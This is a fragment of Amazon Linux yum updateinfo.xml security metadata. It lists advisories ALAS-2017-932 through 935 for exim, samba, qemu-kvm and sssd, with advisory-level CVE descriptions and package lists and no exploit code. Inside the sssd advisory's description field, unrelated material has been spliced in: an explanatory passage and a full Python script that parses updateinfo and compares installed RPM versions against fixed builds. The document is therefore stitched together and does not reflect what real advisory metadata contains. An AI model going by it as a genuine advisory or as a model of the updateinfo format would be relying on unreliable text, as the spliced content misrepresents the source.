arch="x86_64"><filename>Packages/postgresql93-libs-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython26" 
version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-libs" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.20-1.69.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-932</id><title>Amazon Linux AMI 2014.03 - 
ALAS-2017-932: critical priority package update for exim</title><issued date="2017-12-20 18:51:00" /><updated date="2017-12-21 22:55:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-16944:
The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a &#039;.&#039; character signifying the end of the content, related to the bdat_getc function.
1517684:
CVE-2017-16944 exim: infinite loop and stack exhaustion in receive_msg function via vectors involving BDAT commands
CVE-2017-16943:
The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via vectors involving BDAT commands.
1517680:
CVE-2017-16943 exim: use-after-free in receive_msg function via vectors involving BDAT commands
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16943" title="" id="CVE-2017-16943" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16944" title="" id="CVE-2017-16944" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-debuginfo" version="4.89" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.89-4.17.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.89" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.89-4.17.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.89" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.89-4.17.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.89" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.89-4.17.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.89" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.89-4.17.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.89" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.89-4.17.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.89" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.89-4.17.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.89" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.89-4.17.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.89" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.89-4.17.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.89" release="4.17.amzn1" epoch="0" 
arch="i686"><filename>Packages/exim-pgsql-4.89-4.17.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.89" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.89-4.17.amzn1.i686.rpm</filename></package><package name="exim" version="4.89" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.89-4.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-933</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-933: important priority package update for samba</title><issued date="2017-12-20 18:53:00" /><updated date="2017-12-21 22:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15275:
A memory disclosure flaw was found in samba. An attacker could retrieve parts of server memory, which could contain potentially sensitive data, by sending specially-crafted requests to the samba server.
1512465:
CVE-2017-15275 samba: Server heap-memory disclosure
CVE-2017-14746:
A use-after-free flaw was found in the way samba servers handled certain SMB1 requests. An unauthenticated attacker could send specially-crafted SMB1 requests to cause the server to crash or execute arbitrary code.
1511899:
CVE-2017-14746 samba: Use-after-free in processing SMB1 requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14746" title="" id="CVE-2017-14746" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15275" title="" id="CVE-2017-15275" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libwbclient" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.6.2" release="12.37.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.6.2" release="12.37.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.6.2-12.37.amzn1.noarch.rpm</filename></package><package name="samba-common-libs" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.6.2" release="12.37.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/samba-test-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.6.2" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.6.2-12.37.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.6.2" release="12.37.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.6.2-12.37.amzn1.noarch.rpm</filename></package><package name="ctdb-tests" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="ctdb" 
version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.6.2" release="12.37.amzn1" epoch="0" 
arch="i686"><filename>Packages/libwbclient-devel-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.6.2-12.37.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.6.2" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.6.2-12.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-934</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-934: medium priority package update for qemu-kvm</title><issued date="2017-12-20 18:55:00" /><updated date="2017-12-21 22:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15289:
Quick emulator (QEMU), compiled with the Cirrus CLGD 54xx VGA Emulator support, is vulnerable to an OOB write access issue. The issue could occur while writing to VGA memory via mode4and5 write functions. A privileged user inside guest could use this flaw to crash the QEMU process resulting in Denial of Service (DoS).
1501290:
CVE-2017-15289 Qemu: cirrus: OOB access issue in mode4and5 write functions
CVE-2017-14167:
Quick Emulator (QEMU), compiled with the PC System Emulator with multiboot feature support, is vulnerable to an OOB r/w memory access issue. The issue could occur due to an integer overflow while loading a kernel image during a guest boot. A user or process could use this flaw to potentially achieve arbitrary code execution on a host.
1489375:
CVE-2017-14167 Qemu: i386: multiboot OOB access while loading kernel image
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14167" title="" id="CVE-2017-14167" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15289" title="" id="CVE-2017-15289" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm-common" version="1.5.3" release="141.5.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-141.5.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-tools" version="1.5.3" release="141.5.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-141.5.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="141.5.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-141.5.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-debuginfo" version="1.5.3" release="141.5.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-141.5.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm" version="1.5.3" release="141.5.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-141.5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-935</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-935: medium priority package update for sssd</title><issued date="2017-12-20 18:56:00" /><updated date="2017-12-21 22:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12173:
It was found that sssd&#039;s sysdb_search_user_by_upn_res() function did not sanitize requests when querying its local cache and was vulnerable to injection. In a centralized login environment, if a password hash was locally cached for a given user, an authenticated attacker could use this flaw to retrieve it.
1498173:
CVE-2017-12173 sssd: unsanitized input when searching in local cache database
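The advisories in this file all follow the same updateinfo schema: an update element with an id, a severity, cve references, and a pkglist whose package entries carry name, arch, epoch, version and release. The following Python is an added example, not part of the Amazon Linux repository metadata or of yum: it parses that schema and compares each advisory's fixed package against a constructed installed inventory using an rpmvercmp-style epoch/version/release comparison (simplified: no tilde or caret handling). The two-advisory sample tree and the INSTALLED inventory are constructed for the example and mirror ALAS-2017-934 (qemu-kvm, epoch 10) and ALAS-2017-935 (sssd, epoch 0); in practice you would ET.parse() the real updateinfo.xml and build the inventory from rpm -qa with a queryformat listing name, arch, epoch, version and release. The qemu-kvm entry shows why epoch must be compared first: an installed 0:2.0.0 is still older than the advisory's 10:1.5.3.

```python
"""Apply yum updateinfo.xml advisories to an installed-package inventory.

Added example; not code from the repository metadata or from yum. The
rpmvercmp() below is a simplified re-implementation of rpm's algorithm
(numeric and alphabetic runs, numeric beats alpha, no tilde/caret support).
"""
import re
import xml.etree.ElementTree as ET

_SEG = re.compile(r"[0-9]+|[a-zA-Z]+")   # rpm ignores separators, compares runs


def rpmvercmp(a, b):
    """Return 1 if a is newer than b, -1 if older, 0 if equal (rpm rules)."""
    if a == b:
        return 0
    sa, sb = _SEG.findall(a), _SEG.findall(b)
    for x, y in zip(sa, sb):
        xn, yn = x.isdigit(), y.isdigit()
        if xn != yn:
            return 1 if xn else -1        # numeric run beats alphabetic run
        if xn:
            x, y = int(x), int(y)         # numeric runs compare as integers
        if x == y:
            continue
        return 1 if x > y else -1         # alphabetic runs compare like strcmp
    if len(sa) == len(sb):
        return 0
    return 1 if len(sa) > len(sb) else -1  # whichever has segments left wins


def evr_cmp(evr_a, evr_b):
    """Compare (epoch, version, release) tuples; epoch dominates."""
    ea, va, ra = evr_a
    eb, vb, rb = evr_b
    if int(ea) != int(eb):
        return 1 if int(ea) > int(eb) else -1
    c = rpmvercmp(va, vb)
    if c != 0:
        return c
    return rpmvercmp(ra, rb)


def parse_updateinfo(root):
    """Yield (advisory_id, severity, cve_ids, packages) per update element,
    packages being (name, arch, (epoch, version, release)) tuples."""
    for upd in root.iter("update"):
        adv_id = upd.findtext("id")
        severity = upd.findtext("severity")
        cves = [r.get("id") for r in upd.iter("reference") if r.get("type") == "cve"]
        pkgs = [(p.get("name"), p.get("arch"),
                 (p.get("epoch", "0"), p.get("version"), p.get("release")))
                for p in upd.iter("package")]
        yield adv_id, severity, cves, pkgs


def missing_advisories(root, installed):
    """installed maps (name, arch) to (epoch, version, release).
    Returns sorted (advisory_id, severity, name, arch, installed_evr, fixed_evr)
    for every installed package older than the advisory's fixed package."""
    findings = []
    for adv_id, severity, cves, pkgs in parse_updateinfo(root):
        for name, arch, fixed in pkgs:
            have = installed.get((name, arch))
            if have is None:
                continue                  # package not installed, advisory n/a
            if evr_cmp(fixed, have) > 0:  # fixed build is newer than installed
                findings.append((adv_id, severity, name, arch, have, fixed))
    return sorted(findings)


def _pkg(coll, name, arch, epoch, version, release):
    p = ET.SubElement(coll, "package", name=name, arch=arch,
                      epoch=epoch, version=version, release=release)
    ET.SubElement(p, "filename").text = "Packages/%s-%s-%s.%s.rpm" % (name, version, release, arch)


def sample_updateinfo():
    """Constructed two-advisory tree in the schema of this file (built with the
    ElementTree API; a real run would ET.parse() the repository's updateinfo.xml)."""
    root = ET.Element("updates")
    u = ET.SubElement(root, "update", type="security", status="final")
    ET.SubElement(u, "id").text = "ALAS-2017-934"
    ET.SubElement(u, "severity").text = "medium"
    refs = ET.SubElement(u, "references")
    ET.SubElement(refs, "reference", id="CVE-2017-15289", type="cve")
    ET.SubElement(refs, "reference", id="CVE-2017-14167", type="cve")
    coll = ET.SubElement(ET.SubElement(u, "pkglist"), "collection", short="amazon-linux-ami")
    _pkg(coll, "qemu-kvm", "x86_64", "10", "1.5.3", "141.5.amzn1")
    u = ET.SubElement(root, "update", type="security", status="final")
    ET.SubElement(u, "id").text = "ALAS-2017-935"
    ET.SubElement(u, "severity").text = "medium"
    refs = ET.SubElement(u, "references")
    ET.SubElement(refs, "reference", id="CVE-2017-12173", type="cve")
    coll = ET.SubElement(ET.SubElement(u, "pkglist"), "collection", short="amazon-linux-ami")
    _pkg(coll, "sssd", "x86_64", "0", "1.15.2", "50.34.amzn1")
    _pkg(coll, "sssd-client", "i686", "0", "1.15.2", "50.34.amzn1")
    return root


# Constructed inventory (assumption), as rpm -qa with a queryformat would give it.
INSTALLED = {
    ("qemu-kvm", "x86_64"): ("0", "2.0.0", "1.amzn1"),        # epoch 0 is older than 10:1.5.3
    ("sssd", "x86_64"): ("0", "1.15.2", "50.30.amzn1"),       # release 50.30 older than 50.34
    ("sssd-client", "i686"): ("0", "1.15.2", "50.34.amzn1"),  # already at the fixed build
}

if __name__ == "__main__":
    for adv_id, sev, name, arch, have, fixed in missing_advisories(sample_updateinfo(), INSTALLED):
        print("%s [%s] %s.%s installed %s:%s-%s, fixed in %s:%s-%s"
              % ((adv_id, sev, name, arch) + have + fixed))
```

Two findings come back for the constructed inventory (qemu-kvm under ALAS-2017-934 and sssd under ALAS-2017-935); sssd-client is already at the fixed build and is not reported. Note that a package absent from the inventory is skipped rather than flagged, so a host that never installed sssd is not counted as vulnerable to ALAS-2017-935.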
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12173" title="" id="CVE-2017-12173" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sssd-krb5" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-proxy" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-proxy-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-devel-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5-common" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-common-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-devel-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_autofs" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_autofs-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-common-pac" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-pac-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-devel-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-debuginfo" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-debuginfo-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="python27-libipa_hbac" version="1.15.2" release="50.34.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/python27-libipa_hbac-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-ad" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ad-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-common" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="python27-sss-murmur" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-murmur-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-winbind-idmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-winbind-idmap-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="python27-sss" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-dbus" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-dbus-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac-devel" version="1.15.2" release="50.34.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libipa_hbac-devel-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-devel-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_sudo" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_sudo-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-devel-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libsss_nss_idmap-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-ipa" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ipa-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-client" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-client-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-ldap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ldap-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="python27-sssdconfig" version="1.15.2" release="50.34.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-sssdconfig-1.15.2-50.34.amzn1.noarch.rpm</filename></package><package name="libsss_idmap" version="1.15.2" release="50.34.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libsss_idmap-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-tools" version="1.15.2" release="50.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-tools-1.15.2-50.34.amzn1.x86_64.rpm</filename></package><package name="sssd-client" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-client-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-ldap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ldap-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-debuginfo" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-debuginfo-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_autofs" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_autofs-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="python27-libipa_hbac" version="1.15.2" 